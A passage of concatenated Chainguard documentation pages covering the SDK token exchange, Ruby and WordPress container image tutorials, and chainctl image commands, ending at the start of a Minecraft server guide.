It takes the token retrieved with the chainctl binary and exchanges it for the assumable identity to make a call to the Chainguard registry in order retrieve some information about the supplied image. The example uses the cgr.dev/chainguard/static Starter image. To run this example, First, delete the previous example’s main.go file if you haven’t alraedy. Then save the exchange example’s main.go file to your local machine. Then run the following go mod init and go mod tidy commands: go mod init github.com/chainguard-dev/sdk && go mod tidy Following that, execute the program: go run main.go This will return output like the following: { "mediaType": "application/vnd.oci.image.index.v1+json", "size": 925, "digest": "sha256:633aabd19a2d1b9d4ccc1f4b704eb5e9d34ce6ad231a4f5b7f7a3af1307fdba8", "Manifest": "eyJzY2hlbWFWZXJzaW9uIjoyLCJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLmluZGV4LnYxK2pzb24iLCJtYW5pZmVzdHMiOlt7Im1lZGlhVHlwZSI6ImFwcGxpY2F0aW9uL3ZuZC5vY2kuaW1hZ2UubWFuaWZlc3QudjEranNvbiIsInNpemUiOjgzOCwiZGlnZXN0Ijoic2hhMjU2OmJiMmRlMjU3MjFlMTE3Zjg4MDYwYjgyZGQ2YWQ1M2Y4ODdlZTgwOWU1MzE1Y2Y0MWEwMGNkOGExM2ZhMjMwNzciLCJwbGF0Zm9ybSI6eyJhcmNoaXRlY3R1cmUiOiJhbWQ2NCIsIm9zIjoibGludXgifX0seyJtZWRpYVR5cGUiOiJhcHBsaWNhdGlvbi92bmQub2NpLmltYWdlLm1hbmlmZXN0LnYxK2pzb24iLCJzaXplIjo4MzgsImRpZ2VzdCI6InNoYTI1NjoxMmVjMWU3NDg0NmVhNDM1OTNkNmExMzMwZGEyOGVkNGQzNmRmNThhMTg2NGQwOTE1MjRlM2IwYTk5MDY4Y2QzIiwicGxhdGZvcm0iOnsiYXJjaGl0ZWN0dXJlIjoiYXJtNjQiLCJvcyI6ImxpbnV4In19XSwiYW5ub3RhdGlvbnMiOnsiZGV2LmNoYWluZ3VhcmQucGFja2FnZS5tYWluIjoiIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmF1dGhvcnMiOiJDaGFpbmd1YXJkIFRlYW0gaHR0cHM6Ly93d3cuY2hhaW5ndWFyZC5kZXYvIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLmNyZWF0ZWQiOiIyMDI1LTA1LTI4VDEzOjM1OjQ4WiIsIm9yZy5vcGVuY29udGFpbmVycy5pbWFnZS5zb3VyY2UiOiJodHRwczovL2dpdGh1Yi5jb20vY2hhaW5ndWFyZC1pbWFnZXMvaW1hZ2VzL3RyZWUvbWFpbi9pbWFnZXMvc3RhdGljIiwib3JnLm9wZW5jb250YWluZXJzLmltYWdlLnVybCI6Imh0dHBzOi8vaW1hZ2VzLmNoYWluZ3VhcmQuZGV2L2RpcmVjdG9yeS9pbWFnZS9zdGF0aWMvb3ZlcnZpZXciLCJvcmcub3BlbmNvbnRhaW5lcnMuaW1hZ2UudmVuZG9yIjoiQ2hhaW5ndWFyZCJ9fQ==" } As with the chainctl example, the exchange example returns the image’s digest and the OCI manifest data. This proves that you’ve gotten a response back from the registry and that authentication worked as expected. Again, this example doesn’t really reflect a real-world use case. Users will generally access Starter container repositories without authenticating, but this example is still useful for understanding how this can be done with the Chainguard SDK. You can experiment with updating this example to authenticate by assuming an identity you created and retrieve the digest of a container image from your organization’s private repository within the Chainguard registry. To do so, you will need an appropriately-configured assumable identity. You can create an assumable identity with the chainctl iam identities create command. Learn More The Chainguard SDK is a powerful tool for interacting with the Chainguard platform. As mentioned previously, the examples covered in this guide don’t represent a practical real-world application, but they are useful for understanding how the Chainguard SDK works and can be used to authenticate to the Chainguard platform. 
To learn more, you may be interested in the following resources: Overview of Assumable Identities in Chainguard Authenticate to Chainguard’s Registry Chainguard OpenAPI Specification --- ### Getting Started with the Ruby Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/ruby/ Last Modified: February 21, 2025 Tags: Chainguard Containers, Product The Ruby container images maintained by Chainguard are a mix of development and production distroless images that are suitable for building and running Ruby workloads. Because Ruby applications typically require the installation of third-party dependencies via Rubygems, using a pure distroless image for building your application would not work. In cases like this, you’ll need to implement a multi-stage Docker build that uses one of the -dev images to set up the application. In this guide, we’ll build two example applications that demonstrate how to use Ruby container images based on Wolfi as a runtime. In the first, we’ll use a minimal image containing just Ruby to execute a demo that doesn’t have any external dependencies. In the second example, we’ll set up a multi-stage Docker build to run a demo that requires the installation of Rubygems via bundler. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Example 1: Minimal Ruby Container in Single Stage Build We’ll start by creating a small command-line Ruby application to serve as a demo. This application has no external dependencies; it will read from a text file containing facts about octopuses, and output a random line from that file. This demo is also available in our demos repository, if you want to review the source files before building it. Step 1: Setting up the Application First, create a directory and then move into it for your app. Here we’ll use octo-facts: mkdir ~/octo-facts && cd ~/octo-facts Next, create a new file to serve as the application entry point. Here, we’ll use octo.rb. You can edit this file in whatever code editor you would like. We’ll use nano as an example. nano octo.rb The following Ruby code will read a random line from the facts.txt file and print it out to the terminal: #!/usr/bin/env ruby class OctoFact attr_accessor :source def initialize(source = "facts.txt") @source = source end def random_line puts File.readlines(@source).sample end end if __FILE__ == $0 fact = OctoFact.new fact.random_line end Copy this code to your octo.rb script, then save and close the file. Next, pull down the facts.txt file with curl. You can inspect the file’s contents before downloading it to ensure it is safe to do so. Make sure you are still in the same directory where your octo.rb script is. 
curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/ruby/octo-facts/facts.txt With all files in place, you can now run the demo using Docker. The following command will execute the demo code using the same base image we’ll use to build our Dockerfile in the next step. It will set up a volume sharing the files in the current directory with the location /work inside the container, then execute the octo.rb script: docker run --rm -v ${PWD}:/work cgr.dev/chainguard/ruby octo.rb And you should get output like this, with a random fact about octopuses: Octopuses have decentralized brains. In the next step, we’ll create a Dockerfile to build and run the demo. Step 2: Setting up the Dockerfile With the demo ready, you can now set up a Dockerfile to build a custom image for your Ruby application. Make sure you’re still in the same directory as the application files, then create a new Dockerfile using your text editor of choice: nano Dockerfile The following Dockerfile will: Start a new image based on the cgr.dev/chainguard/ruby:latest container image; Set up a workdir at /app; Copy the application files to the workdir; Set up the entry point for the container as ruby octo.rb. Copy the following content to your Dockerfile:
FROM cgr.dev/chainguard/ruby:latest
WORKDIR /app
COPY octo.rb facts.txt ./
ENTRYPOINT [ "ruby", "octo.rb" ]
Save and close the file when you’re done. Next, build the container image with: docker build . --pull -t octo-ruby-demo Once the build is finished, you can execute the container with: docker run --rm octo-ruby-demo And you should get output similar to what you got before, with a random octopus fact. Example 2: Multi-Stage Build for Ruby Application Runtime To demonstrate how to containerize a more complex application that requires the installation of third-party dependencies, we’ll create a second demo that uses a Docker multi-stage build, which will combine the cgr.dev/chainguard/ruby:latest-dev development image to build the application and the cgr.dev/chainguard/ruby:latest distroless image to run it. This demo will use the rainbow Ruby gem to output a colorful quote to the command line interface, inspired by cowsay. Step 1: Setting up the Application First, create a directory for your app. Here we’ll use linky-says: mkdir ~/linky-says && cd ~/linky-says Then, set up your Gemfile: nano Gemfile Copy the following content into your Gemfile to require the Rainbow gem: source 'https://rubygems.org' gem 'rainbow' Save and close the file. Next, create a new Ruby script file called linky.rb: nano linky.rb The following code outputs a colorful quote provided at runtime, incorporating an ASCII representation of Linky that is pulled from a linky.txt file located in the same directory as the Ruby script. The printed quote colors alternate randomly between purple and magenta.
#!/usr/bin/env ruby

require 'rainbow'
Rainbow.enabled = true

class Linky
  def says(message = "Hello World")
    colors = [:purple, :magenta]
    words = message.split(" ")
    print "\n".ljust(40, " ")
    words.each do |n|
      print Rainbow(n).color(colors.sample) + " "
    end
    print "\n"
    puts File.readlines('linky.txt')
  end
end

if __FILE__ == $0
  linky = Linky.new
  inputArray = ARGV
  message = inputArray.length > 0 ? inputArray.join(' ') : "Hello Wolfi"
  linky.says(message)
end
Copy this code to your linky.rb script, then save and close the file. Next, pull down the ASCII linky.txt file with curl. You can inspect the file contents before downloading it to ensure it is safe to do so.
Make sure you are still in the same directory where your linky.rb script is. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/main/ruby/linky-says/linky.txt With everything in place, you can now work on the Dockerfile that will install the application dependencies and execute your Ruby script. Step 2: Setting Up the Dockerfile To make sure our final container is distroless while still being able to install Rubygems, our build will consist of two stages: first, we’ll build the application using the dev image variant, a Wolfi-based image that includes the Gem executable, Bundler, and other useful tools for development. Then, we’ll create a separate stage for the final container. The resulting container will be based on the distroless Ruby Wolfi image, which means it doesn’t come with the Gem executable or even a shell. Create a new Dockerfile using your code editor of choice, for example nano: nano Dockerfile The following Dockerfile will: Start a new build stage based on the cgr.dev/chainguard/ruby:latest-devcontainer image and call it builder; Set up environment variables that define the default location of installed Gems; Copy the Gemfile from the current directory to the /work location in the container; Install Bundler and run bundle install; Start a new build stage based on the cgr.dev/chainguard/ruby:latest image; Set up environment variables that define the default location of installed Gems; Copy build artifacts from builder and into the final container Copy the linky.rb and linky.txt files into the final container Set up the application entry point as ruby linky.rb. Copy this content to your own Dockerfile: FROMcgr.dev/chainguard/ruby:latest-dev AS builderENV GEM_HOME=/work/vendorENV GEM_PATH=${GEM_PATH}:/work/vendorCOPY Gemfile /work/RUN gem install bundler && bundle installFROMcgr.dev/chainguard/ruby:latestENV GEM_HOME=/work/vendorENV GEM_PATH=${GEM_PATH}:/work/vendorCOPY --from=builder /work/ /work/COPY linky.rb linky.txt /work/ENTRYPOINT [ "ruby", "linky.rb" ]Save the file when you’re finished. You can now build the image with: docker build . --pull -t linky-says Once the build is finished, run the container with: docker run --rm linky-says Wolfi says hi And you should get output like this: Wolfi says hi @@@ @@@*******@@@ / @@%**@@@@*******@@@ / @@*@@***********///@@ / @*************///////&@ / @@*****%@@@**////@@@&//@@ / @*****@**##@////@//##@//@ / @@*****@@@@//////@@@@//@@ / ,@@@@***////////////////@@@@, @@@*******/////////////////////(((((@@@ @*******//////////////////////((((((((@ @@@/////////@///////@///(((((%@@@ #@///////@@@///////@@@((((((#@ @@@ /@@///@@, @@@ If you inspect the image with a docker image inspect linky-says, you’ll notice that it has only three layers, thanks to the use of a multi-stage Docker build. docker image inspect linky-says ... "RootFS": { "Type": "layers", "Layers": [ "sha256:ec653fe8da922557dd1d78b47b2c0074a6e9257e5a15e596bc4e1fb1e325c3d8", "sha256:d9541a2e82274d8140ed7f4cc79ce92f295d13951585c4a433f1baa35015e1eb", "sha256:a44e5fee28e11702a63418bf76c009b1b4948f1b0426e0f199b83702ae187796" ] }, "Metadata": { "LastTagTime": "2023-05-09T19:53:16.060125796+02:00" } } ] In such cases, the last FROM section from the Dockerfile is the one that composes the final image. That’s why in our case it only adds two layers on top of the base cgr.dev/chainguard/ruby:latest image, containing the two COPY commands we use to copy the application files and its dependencies to the final image. 
It’s worth highlighting that no code or data is carried from one stage to the other unless you use a COPY command to explicitly copy it. This approach facilitates creating a slim final image with only what’s absolutely necessary to execute the application. Using a multi-stage build like this, without shell tools and interactive language interpreters built in also makes your final container image more secure. Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Ruby Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Manage Chainguard Container Images with chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-images/ Last Modified: March 6, 2025 Tags: chainctl, images, Product This page presents some of the more common ways to learn about the Chainguard container images that are available to you. We use chainctl images commands to list available repositories and container images, examine images more closely, and compare them to one another. For a full reference of all commands with details and switches, see chainctl Reference. List Available Chainguard Container Images When you want to know which Chainguard Containers are available to your account, use the following command: chainctl images list This will respond with a list of organizations available to your account. For most users, there will only be one entry in the list. This example shows an account with access to several organizations within the fictional MyCorp. Which organization would you like to list images from? > [MyCorp-prod] This group holds the production Chainguard Containers hosted under cgr.dev/MyCorp-prod [MyCorp-starter] This group holds the starter Chainguard Containers hosted under cgr.dev/MyCorp-starter [MyCorp-eval] This group holds the evaluation Chainguard Containers hosted under cgr.dev/MyCorp-eval Move the > up and down with the arrow keys and hit Enter to select the appropriate org. Then the command will return the list. Be warned, that list may take a while to generate and is likely to scroll past quickly in your command line terminal. You may prefer to direct the output into a file. Here’s an abbreviated example of what will be returned: ... 
├ [python] │ ├ sha256:038449621d30e512645107e6b141fbfb5320d8f0caacd3d788e5a3be8da16def │ │ ├ [3.11] │ │ └ [3.11.12] │ ├ sha256:07756f3cf511a6227ae70d816c57b01a6fd9e805a587db5ebb4e17a5954b38c4 │ │ └ [3.11.9] │ ├ sha256:088b946519e5c766685e335366abe8a6160e3bd108a6525309f7186e943a4666 │ │ └ [3.11.9-dev] │ ├ sha256:09cb17be345eac82e3fdb017590d5907c582b4bd5ac86ed5e054bae739a9babd │ │ └ [3.13.0] │ ├ sha256:16b52893f316d9d7074b9c24c30f82eab1e94356461439d4be1a62fe229e6933 │ │ └ [3.12.7] │ ├ sha256:1b53a821fe44d699687d1ca2318e3f90fed4af97833ab40384ea77c746b54ed9 │ │ └ [3.10.16] │ ├ sha256:1c3e412aff5bddf54718d1bc0b4598ea30d18005e7dbfeb7e68bdae0f874682b │ │ ├ [3] │ │ ├ [3.13] │ │ ├ [3.13.3] │ │ └ [latest] ... This will continue until all images (like python above) are listed with all their variants (releases like 3.13.3). Notice that the list is not necessarily in order of release. List Available Container Repos For a list of image repositories available to your account, use: chainctl images repos list Examine the History of Container Images To examine the history of an image tag in chainctl, like when it was updated and the associated digests for each update, use chainctl images history. This will also return information such as how many times a variant has been built and for which platforms, along with the time and digests for each. To examine the history without using the menu shown earlier, use the optional --parent=$ORGANIZATION switch to designate your org, like this: chainctl images history $IMAGE:$TAG --parent=$ORGANIZATION For example, let’s find the history of one of the python image variants from our previous list, 3.12.7. So we enter: chainctl images history python:3.12.7 --parent=chainguard.edu The returned list is longer than is shown here, but here’s a useful excerpt: - time: 2024-11-29 08:11:03 UTC digest: sha256:16b52893f316d9d7074b9c24c30f82eab1e94356461439d4be1a62fe229e6933 architectures: amd64: sha256:755b79b43c1e76472cc467c4636bdb75bf4c2fcc551103087df0a4b0dc039164 (23.14 MB) arm64: sha256:d7dfaf24f292f490279611afcec49289aa528dba531590bebae059c7d3139ed6 (22.13 MB) - time: 2024-11-25 23:45:42 UTC digest: sha256:025bbe734f9bb3550ea845f028f28c76c6dff742527e2764f4ba40b3773ee4f8 architectures: amd64: sha256:c7b70882c6fe9b563aa5d5bdfb1a960c65b8c73e0830fc809ceb977e7f778e98 (23.14 MB) arm64: sha256:864f735794264120aabdc9eda9e1126140762e1c11eed96a89b0ab2056cc3662 (22.13 MB) - time: 2024-11-22 01:32:55 UTC digest: sha256:2a936c40669150e1a92e4c80b27410786925b8619c0ecc1679ec0a0f6b707235 architectures: amd64: sha256:8db3676319588dca04664a4a57c9fa464398fa2fc6874d5a1500273cabdbde04 (23.16 MB) arm64: sha256:ec8b8ef474ad6be50649cd9403882569d2cd1e71ac65e3bc263fc78aaef7608e (22.13 MB) ... - time: 2024-10-02 23:56:00 UTC digest: sha256:c7cf9f46124502b9e8aadf26b4c58e0cdbd5a08b0b97b6d3a451b89563a308e8 architectures: amd64: sha256:d4606173598e7103015b37dec4894771bf9cc221db6f7b102006eb81962c0696 (23.43 MB) arm64: sha256:f76a0a2f49418b030f3a31bcd2c8bddb8bbef7b006006aa59b74282955ab671d (22.41 MB) - time: 2024-10-01 23:40:56 UTC digest: sha256:0b0daf09eeb92741efe0eae51dbdeea5a66bed870e0e00895630de729b233b7f architectures: amd64: sha256:637af1b20e5f8cee7e538b07a1ae3934297769216a65acc454e34fac3dcd3828 (23.46 MB) arm64: sha256:8dce068942fa4dd155c87b6b8a3e4b8e2482a5fdb5232cb9dd73c39e63003038 (22.41 MB) The command returns a reverse-chronological history of when a specific tag was updated to point to a new manifest digest. 
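Once you have a digest from this history, you can pin to that exact build by pulling the image by digest rather than by tag. As an illustration only (reusing the most recent digest shown above and the chainguard.edu organization path from this example; substitute your own organization and repository):

docker pull cgr.dev/chainguard.edu/python@sha256:16b52893f316d9d7074b9c24c30f82eab1e94356461439d4be1a62fe229e6933

Pulling by digest guarantees you get the same manifest every time, regardless of where the tag later points.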
If images are not multi-arch, only a single digest without architecture will be displayed. When the release version tag is not provided, the command will present you with a menu that lets you select which tag you’d like to obtain the history for. For example, if you enter: chainctl images history python --parent=chainguard.edu This will present you with a menu like this:
Which tag of python would you like to view history for?
> 3
  3-dev
  3.10
  3.10-dev
  3.10.14
  3.10.14-dev
  3.10.14-r2
  3.10.14-r2-dev
  3.10.14-r3
  3.10.14-r3-dev
  3.10.14-r4
  3.10.14-r4-dev
  3.10.14-r5
Once you make a selection, the details will be returned for that variant. Compare Chainguard Container Images When you want to compare two Chainguard images, enter: chainctl images diff $FROM_IMAGE $TO_IMAGE See How To Compare Chainguard Containers with chainctl to learn more. --- ### Getting Started with the WordPress Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/wordpress/ Last Modified: March 24, 2025 Tags: Chainguard Containers, Product The WordPress Chainguard Container is a container image suitable for creating and running WordPress projects. Designed to work as a drop-in replacement for the official WordPress FPM-Alpine image, the Chainguard WordPress Container features a distroless variant for increased security in production environments. The image is built with the latest PHP and WordPress versions, and includes the necessary PHP extensions to run WordPress. In this guide, we’ll demonstrate three different ways in which you can use the WordPress Chainguard Container to build and run WordPress projects. Preparation This tutorial requires Docker to be installed on your local machine. If you don’t have Docker installed, you can download and install it from the official Docker website. Cloning the Demos Repository Start by cloning the demos repository to your local machine: git clone git@github.com:chainguard-dev/edu-images-demos.git Locate the wordpress demo and cd into its directory: cd edu-images-demos/php/wordpress Here you will find three folders, each with a different demo that we’ll cover in this guide. Example 1: Testing the Container Image with a Fresh WordPress Install You can use the latest-dev variant of the Chainguard WordPress Container to create a project from scratch and go through the installation wizard. This method is useful for testing the container image and getting familiar with its features; however, changes made to the WordPress installation will not persist unless you set up a volume with proper permissions to share container contents with the host machine. We’ll see how to do that in the next example. The files for this demo are located in the 01-preview directory. You can access this directory and open the docker-compose.yaml file in your editor of choice to follow along.
Here’s the content of the docker-compose.yaml file from our first demo:
services:
  app:
    image: cgr.dev/chainguard/wordpress:latest-dev
    restart: unless-stopped
    environment:
      WORDPRESS_DB_HOST: mariadb
      WORDPRESS_DB_USER: $WORDPRESS_DB_USER
      WORDPRESS_DB_PASSWORD: $WORDPRESS_DB_PASSWORD
      WORDPRESS_DB_NAME: $WORDPRESS_DB_NAME
    volumes:
      - document-root:/var/www/html
  nginx:
    image: cgr.dev/chainguard/nginx
    restart: unless-stopped
    ports:
      - 8000:8080
    volumes:
      - document-root:/var/www/html
      - ./nginx.conf:/etc/nginx/nginx.conf
  mariadb:
    image: cgr.dev/chainguard/mariadb
    restart: unless-stopped
    environment:
      MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1
      MARIADB_USER: $WORDPRESS_DB_USER
      MARIADB_PASSWORD: $WORDPRESS_DB_PASSWORD
      MARIADB_DATABASE: $WORDPRESS_DB_NAME
    ports:
      - 3306:3306
volumes:
  document-root:
In this Docker Compose example, we define three services: app, nginx, and mariadb. Here’s a breakdown of each service: The app service uses the latest-dev variant of the Chainguard WordPress Container, and is configured to connect to the mariadb service. The entrypoint script in the WordPress container image looks for environment variables to set up a custom wp-config.php file. The volume document-root defines a volume that will be shared between the app and the nginx services. The nginx service uses the Chainguard nginx Container, and is configured to serve the WordPress application on port 8000. The mariadb service uses the Chainguard MariaDB Container, and is configured with the necessary environment variables to create a database for the WordPress application. The environment variables used in this example are defined in a .env file located in the same directory as the docker-compose.yaml file. To check its contents, run: cat .env
WORDPRESS_DB_HOST=mariadb
WORDPRESS_DB_USER=wp-user
WORDPRESS_DB_PASSWORD=wp-password
WORDPRESS_DB_NAME=wordpress
Although not necessary, you can change these values to suit your needs. Notice this is a hidden file and might not be visible in your file explorer, but you can open it in your terminal using a text editor like nano or vim. To start the services, run: docker compose up If you navigate to http://localhost:8000 in your browser, you should see the WordPress installation page. Follow the on-screen instructions to complete the WordPress setup. Keep in mind that any customizations will be lost once the environment is torn down. To stop the services, type CTRL+C in the terminal where the services are running, and then run: docker compose down This will remove the containers and networks created by the docker compose up command. In the next example, we’ll demonstrate how you can set up a volume with proper permissions to be able to persist customizations such as themes and plugins. Example 2: Customizing a New WordPress Installation To persist customizations made to your WordPress site, such as the installation of new themes and plugins, you’ll need to set up a volume with proper permissions in order to keep data between container rebuilds. This requires having a system user in the container with the same UID as your local system user on the host machine. To set this up, we’ll create a custom Dockerfile that adds a wordpress user with the specified UID (set to 1000 by default, which is typically the UID of a regular user on Linux-based systems) to the latest-dev variant of the Chainguard WordPress Container. The Dockerfile also changes default permissions on the /var/www/html directory to allow the wordpress user to write to it. Navigate to the 02-customizing directory to follow along.
This is how the described Dockerfile included in this directory looks:
FROM cgr.dev/chainguard/wordpress:latest-dev
ARG UID=1000
USER root
RUN addgroup wordpress && adduser -SD -u "$UID" -s /bin/bash wordpress wordpress
RUN chown -R wordpress:wordpress /var/www/html
USER wordpress
In the docker-compose.yaml file, we’ll reference the custom Dockerfile and pass the UID as a build argument:
services:
  app:
    image: wordpress-local-dev
    build:
      context: .
      dockerfile: Dockerfile
      args:
        UID: 1000
    user: wordpress
    restart: unless-stopped
    environment:
      WORDPRESS_DB_HOST: mariadb
      WORDPRESS_DB_USER: $WORDPRESS_DB_USER
      WORDPRESS_DB_PASSWORD: $WORDPRESS_DB_PASSWORD
      WORDPRESS_DB_NAME: $WORDPRESS_DB_NAME
    volumes:
      - ./wp-content:/var/www/html/wp-content
      - document-root:/var/www/html
  nginx:
    image: cgr.dev/chainguard/nginx
    restart: unless-stopped
    ports:
      - 8000:8080
    volumes:
      - document-root:/var/www/html
      - ./nginx.conf:/etc/nginx/nginx.conf
  mariadb:
    image: cgr.dev/chainguard/mariadb
    restart: unless-stopped
    environment:
      MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1
      MARIADB_USER: $WORDPRESS_DB_USER
      MARIADB_PASSWORD: $WORDPRESS_DB_PASSWORD
      MARIADB_DATABASE: $WORDPRESS_DB_NAME
    ports:
      - 3306:3306
volumes:
  document-root:
Only the app service has changed in this example. We’ve added a build section that references the custom Dockerfile, and we’ve set the UID build argument to 1000 by default. This can be overridden when you build the image, as we’ll do next. We’ve also added a volume share to persist the contents of the wp-content folder to the host machine. To build your custom container image and pass along your own UID as build argument, run: docker compose build --build-arg UID=$(id -u) app You should get output indicating that the container image was successfully built. Now you can get your environment up with: docker compose up Once the environment is up and running, you can access your WordPress installation from your browser at localhost:8000. If you go to another terminal window and check the contents of the 02-customizing/wp-content folder, you’ll notice that it was populated with the default WordPress themes and plugins:
❯ ls -la wp-content
total 24
drwxrwxr-x  4 erika erika 4096 Jul 18 21:16 .
drwxrwxr-x  3 erika erika 4096 Jul 18 21:15 ..
-rw-rw-r--  1 erika erika   14 Jul 18 21:05 .gitignore
-rw-r--r--  1 erika 65533   28 Jan  1  1970 index.php
drwxr-xr-x  2 erika 65533 4096 Jul 18 21:16 plugins
drwxr-xr-x 16 erika 65533 4096 Jul 18 21:16 themes
This is only possible because of the custom Dockerfile we created, which added a wordpress user with the same UID as the local user on the host machine. You can now install new themes and plugins, and they will persist between container rebuilds. To stop the services, type CTRL+C in the terminal where the services are running, and then run: docker compose down In the next example, we’ll see how you can create a distroless WordPress runtime for your production environment. Example 3: Using the Distroless Variant of the WordPress Container Image This demo uses a multi-stage Docker build to create a final distroless container image to improve overall security. The distroless image contains the necessary dependencies to run WordPress and won’t allow for new package installations or shell access, reducing the image attack surface. The main difference here is that we’re calling the entrypoint script at build time instead of run time. This is done to ensure the image is self-contained and doesn’t rely on volumes set up within the host machine in order to work.
Any customizations should be included in the wp-content folder that will be copied to the image at build time. Although this increases final image size due to the inclusion of custom content at build time, it limits what can be changed or added to the container image once it’s built. This demo includes a theme (Cue, a simple blogging theme) and a plugin (Imsanity, a popular plugin used to resize images) to demonstrate how to include custom content in the container image. Navigate to the 03-distroless directory to follow along. This is what the Dockerfile included in this directory looks like:
FROM cgr.dev/chainguard/wordpress:latest-dev AS builder

# trigger wp-config.php creation
ENV WORDPRESS_DB_HOST=foo

# copy wp-content folder
COPY ./wp-content /usr/src/wordpress/wp-content

# run entrypoint script
RUN /usr/local/bin/docker-entrypoint.sh php-fpm --version

FROM cgr.dev/chainguard/wordpress:latest
COPY --from=builder --chown=php:php /var/www/html /var/www/html
Notice that we’re copying the contents of the local wp-content folder to the /usr/src/wordpress folder in the container. This is the location of the WordPress source files. These will be copied to the document root by the entrypoint script that is executed right afterward. At the builder stage, we’re also setting up a single environment variable to trigger the creation of the wp-config.php file, which relies on a set of environment variables to configure database access. In the docker-compose.yaml file, we reference the custom Dockerfile:
services:
  app:
    image: wordpress-local-distroless
    build:
      context: .
      dockerfile: Dockerfile
    restart: unless-stopped
    environment:
      WORDPRESS_DB_HOST: mariadb
      WORDPRESS_DB_USER: $WORDPRESS_DB_USER
      WORDPRESS_DB_PASSWORD: $WORDPRESS_DB_PASSWORD
      WORDPRESS_DB_NAME: $WORDPRESS_DB_NAME
      WORDPRESS_CONFIG_EXTRA: |
        # Disable plugin and theme update and installation
        define( 'DISALLOW_FILE_MODS', true );
        # Disable automatic updates
        define( 'AUTOMATIC_UPDATER_DISABLED', true );
    volumes:
      - document-root:/var/www/html
  nginx:
    image: cgr.dev/chainguard/nginx
    restart: unless-stopped
    ports:
      - 8000:8080
    volumes:
      - document-root:/var/www/html
      - ./nginx.conf:/etc/nginx/nginx.conf
  mariadb:
    image: cgr.dev/chainguard/mariadb
    restart: unless-stopped
    environment:
      MARIADB_ALLOW_EMPTY_ROOT_PASSWORD: 1
      MARIADB_USER: $WORDPRESS_DB_USER
      MARIADB_PASSWORD: $WORDPRESS_DB_PASSWORD
      MARIADB_DATABASE: $WORDPRESS_DB_NAME
    ports:
      - 3306:3306
volumes:
  document-root:
You can now build and run your environment with: docker compose up --build The behavior of this WordPress setup should be similar to the previous examples, but this time, the container image is self-contained and doesn’t rely on volumes set up within the host machine to work, in addition to not allowing new package installations or login through a shell. We also set up the WORDPRESS_CONFIG_EXTRA environment variable to disable the installation of new themes and plugins, and to block automatic updates. This increases security by blocking file changes in the container. To stop the services, type CTRL+C in the terminal where the services are running, and then run: docker compose down To keep your WordPress installation up to date with the latest versions, you can use digestabot, a GitHub Action that works in a similar way to Dependabot, sending a pull request to a repository whenever a new version of a container image is available. This will ensure you’re always running the most recent version of WordPress available in Wolfi.
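As a rough sketch of how digestabot might be wired into a repository, the following GitHub Actions workflow runs the action on a weekly schedule. The schedule, job name, and the token input shown here are illustrative assumptions rather than settings taken from this guide, so check the digestabot repository for its current inputs and recommended configuration:

name: digestabot
on:
  schedule:
    - cron: "0 6 * * 1"  # weekly; adjust as needed (assumed value)
  workflow_dispatch: {}
permissions:
  contents: write
  pull-requests: write
jobs:
  update-image-digests:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Assumed input: a token with permission to open pull requests.
      - uses: chainguard-dev/digestabot@v1
        with:
          token: ${{ secrets.GITHUB_TOKEN }}

When a referenced image digest changes upstream, the action opens a pull request updating the pinned digest in your Dockerfiles or manifests.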
Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose WordPress Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Setting Up a Minecraft Server with the JRE Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/jre-minecraft/ Last Modified: March 26, 2025 Tags: Chainguard Containers, Product Introduction Minecraft is an open-world game where players can build, explore, and adventure in a procedurally generated world. First released in 2011, it is the best-selling video game of all times, with a massive active userbase of 170 million monthly players as of 2024. Although single player mode is common, many players prefer to play together in multiplayer mode where they can join forces to tackle more complex projects. This typically requires setting up a remote server with the Minecraft server software, which runs on top of a Java runtime environment (JRE). In this guide, we’ll set up a Minecraft Java server using Chainguard’s JRE image for a low-to-zero CVE runtime environment. We’ll start with a basic setup that we’ll improve as we go through the guide. This guide will also explore a few different strategies to secure your containerized Minecraft server setup. Prerequisites To follow along, you will need Docker installed on the system where you want to run your Minecraft server. This can be a machine from your local network or a remote server. The Minecraft server software does not require a paid license or subscription, so you can download it for free. To test the server, however, you’ll need a copy of Minecraft Java edition, which is compatible with macOS, Linux, and Windows systems. Please note there are two versions of Minecraft: Java and Bedrock. In this tutorial we’ll be focusing on the Java version, which runs on all operating systems but doesn’t run on consoles. Create a new folder in your home directory where you’ll be working on your Minecraft server project: mkdir ~/minecraft-server cd ~/minecraft-server Unless otherwise specified, all commands from this guide should be executed from this folder. 1 – Creating a Basic Setup with Docker and Docker Compose We’ll start with a basic setup that we’ll improve in the next steps. Our first task is to set up a basic Dockerfile that is able to run the 